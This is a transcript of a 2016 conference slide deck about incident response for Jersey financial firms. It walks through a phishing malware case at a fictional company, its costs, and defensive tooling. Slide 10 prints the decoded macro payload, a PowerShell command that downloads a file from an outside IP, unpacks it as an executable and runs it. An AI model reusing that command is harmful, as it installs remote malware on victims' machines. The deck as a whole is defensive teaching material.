My incident Response from Techfair 2016 in Jersey. The talk explores how incident response could to comply with the requirements set out in the Jersey Financial Services Commission Dear CEO letter on cyber security.

1. Up your Game
In the wake of Dear CEO

2. Who am I
• Security Team Lead @ Logicalis Jersey
• Incorporated Engineer (IEng) / Chartered IT professional (CITP)
• Channel Island s Information Security Forum (CIISF) founder
• Secretary British Computer Society Jersey
• My role is a mixture of offense and defence for clients of all
sizes and verticals including forensic malware investigations.

3. How we got here
“We expect that registered persons will take appropriate steps
to properly manage their cyber security arrangements”
cyber-security arrangements”
The Boards of Directors (or equivalent) of registered persons
will take overall responsibility for ensuring that their firm
adequately addresses cyber security risks
A registered person should:
• Understand (and document) the risk of a cyber-attack on their business …
• Have in place appropriate contingency arrangements that they can deploy in
the event of a cyber attack
• Review these matters and test their effectiveness

4. 5 Key Questions – Incident Response
[1] Can we determine how many hosts and when they
talked to the bad domain? How far can we go back in
time to check /prove this?
[2] What information do we have available to us? Logs?
Endpoint protection system?
[3] Did any of the affected hosts communicate with other
network system. If they did, what occurred?
[4] How long did it take us to detect and remedy the
incident
[5] What was the cost to the business?

5. Incident Response Stages
Preparation
Incident
IdentificationEradication
Recovery
Lessons
Learned
Without information, you
cannot respond!!
The more information that
you have the better your
response.
Effective Incident response is
about being able to pivot
quickly and direct your
response accordingly.

6. Meet Calculon Inc.
300
100 90
Cayman = 50
BVI = 50
Time = - 5 hours
Jersey = 180
Guernsey =100
London = 20
HK = 40
Kuala Lumpur = 30
Shanghai = 20
Time = +8 hours

7. Preparation - Threat Model
Threat Vulnerability Impact Business
Impact
Controls
Email Phishing Social
Engineering
Possible
Compromise
System rebuild Logging
Anti Virus
Malvertising
Attack
Outdated Adobe
Flash
Possible
Compromise
System rebuild Ad Blocker
Anti Virus
Web Attack
against
culculon.com
Vulnerability in
web application
stack
Website
compromised
Reputational
Loss
Keep website
stack up to date
DDOS against
Culculon.com
Insufficient
bandwidth
Website not
available
Minor
reputational loss
Consider DDOS
protection

8. Preparation - Cyber kill chain
“You only have to be fooled once, be slow in
reacting, just once. How are you going to be
sure to never make a mistake? You cant plan for
that. That’s Life”

9. 2016 2016Day 1 2 3 4 5 6 7
Phishing email received
11/11/2016
System cleanup started
11/11/2016
Systems cleanup completed
11/14/2016
11/11/2016 Identify Infected systems
11/11/2016 Delete Citrix users profiles
11/11/2016 Disconnect infected systems from network
11/11/2016 - 11/14/2016 Rebuild infected systems
11/11/2016 Delete email from Exchange server
11/11/2016 Inform BVI/Cayman of the attack
11/14/2016 - 11/16/2016Reporting
11/17/2016Cost of incident
Incident – Malware Attack

10. Incident – Malware attack
It has code hidden in Excel spreadsheet
When decoded it becomes…..
cmd /K PowerShell.exe (New-Object
System.Net.WebClient).DownloadFile('http://92.63.
88.63/kwefewef/fgdsee/dxzq.jpg','%TEMP%JIOiodf
hioIH.cab'); expand %TEMP%JIOiodfhioIH.cab
%TEMP%JIOiodfhioIH.exe; start
%TEMP%JIOiodfhioIH.exe;
VBA macro virus with hidden URL

11. Incident – Lessons Learned
[1] Insufficent logging available
[2] “Triage” took too long
[4] Volatile Forensic data lost
[3] Lack of support skills in outside UK locations
[5] USB / DLP / Drive Encryption made analysis difficult
[6] AV showed no infection / Incident response tools
showed no malicious processes
[7] Reporting took too long

12. Incident 1 – Business Cost
25 who clicked email phish
Citrix = 12
Various
Locations
Jersey,
Guernsey
and
London
KL Calculon partner
HK Calculon senior
executive
12 x Citrix Users - £150 per hour – 6 Hours = £3,600
9 x Citrix Users - £200 per hour – 10 Hours = £18,000
4 x Citrix Users - £400 per hour – 5 Hours = £8,000
IT support Costs = £2,000
Total Cost = £31,600

13. Improving Our Response – Passive DNS
https://blog.redcanary.com/2015/07/02/passive-dns-monitoring-your-ir-team-needs-it/
[1] Cheap to setup
[2] Use ‘Bro’ with Intel
Critical Stack
https://nullsecure.org/building-your-own-passivedns-feed/
[3] Solves Question 1

14. Endpoint Logging
[1] Level One
• User logins / logoff events
• User Account creation, deletion and modification
[2] Level Two
• Process creation / termination on systems
• Use of sensitive privileges
[3] Must Have
• Logs must be stored centrally – avoids anti forensics clearing of logs
• Available for historic querying and hunting of suspicious activity

15. Endpoint Forensics
[1] Directly examine the memory
• Not susceptible to malware tampering.
• More information available – malware can’t hide.
[2] Scalability
• We need to be able to ask questions of systems remotely.
• Allows us to pivot and focus on what needs to “get done” in an incident.
[3] Memory Samples
• Contain information as well as disk artefacts.
• Existing “Live IR” tools are insufficient.
Threat Hunting = Endpoint Logging + Forensics + Netflow

16. ELK Stack Explained

17. ELK Demo

18. Google Rapid Response
Cross-platform support for
Linux, Mac OS X and
Windows clients.
Live remote memory
analysis and imaging
Powerful search and
download capabilities for
files and the Windows
registry.
Secure communication
infrastructure designed for
Internet deployment.
Detailed monitoring of
client CPU, memory, IO
usage and self-imposed
limits
https://github.com/google/grr

19. Reporting / Compliance
https://github.com/certsocietegenerale/FIR
Python / Django Web
Application
Open sourced by Societe
Generale Incident Response
Team
Customisable and freely
available to you to record
your incidents in.
GPL V3 licensed – You
can make change for
your own use.

20. Canaries, Tokens and Honey Hashes
Canary Token: Something you put on your network, if opened you get an email
alert
Canary Device: A honeypot with an internet console that pretends to mimic
something else that creates alerts when accessed.
Honey Hash: A fake NTLM password hash that you put in critical servers to detect Pass The
Hash attacks.

21. Integrating SIEM into your response
Endpoint logging and forensics
integrated via event collectors
Threat intelligence feeds directly
integrated into SIEM
AV / Next gen AV supported
Passive DNS integrated

22. Bridging the skills gap
Forensic Images:
http://www.forensicfocus.com/images-and-challenges
Volatility Framework:
http://volatility-labs.blogspot.com/
Incident Response:
http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf

23. Questions
Can your organisation prevent, detect and
respond to cyber security threats that you face?
In an incident could you answer the five key
questions?
@cyberkryption